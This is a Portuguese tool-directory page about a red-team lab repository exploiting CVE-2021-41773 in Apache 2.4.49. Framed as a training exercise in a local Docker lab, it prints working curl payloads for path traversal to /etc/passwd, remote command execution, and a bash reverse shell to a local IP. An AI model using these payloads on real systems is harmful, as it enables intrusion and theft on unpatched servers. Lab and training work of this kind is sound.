Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 Path Traversal RCE | Kitploit
Ferramentas/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 Path Traversal RCE

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 5 mesesAinda não revisado

CVE-2021-41773 — Apache HTTP Server 2.4.49 Path Traversal / Execução Remota de Código

Departamento de Cibersegurança da ITSOLERA — Tarefa #3 da Red Team
Equipe: Offensive Team Zeta
Data: 18 de Março de 2026


⚠️ Aviso Legal

Este repositório é apenas para fins educacionais.
Todos os testes foram realizados em um laboratório Docker local isolado.
Nunca use contra sistemas ativos, de produção ou de terceiros.


Resumo do CVE

CampoDetalhe
CVE IDCVE-2021-41773
CVSS9.8 CRÍTICO
AfetadoApache HTTP Server 2.4.49 APENAS
TipoPath Traversal + Execução Remota de Código
Corrigido emApache 2.4.51

Conteúdo do Repositório


Configuração do Laboratório

root@kitploit:~
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49

Exploração

root@kitploit:~
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
Baixar ferramenta
ArquivoDescrição
poc_41773.pyScript de exploit PoC em Python com banner da Team Zeta
docker-compose.ymlConfiguração do ambiente de laboratório vulnerável
offensive_zeta_shell.txtLog da sessão ao vivo — prova da exploração
screenshots/Capturas de tela de evidência
Offensive_Team_Zeta_FINAL_Report.pdfRelatório completo de exploração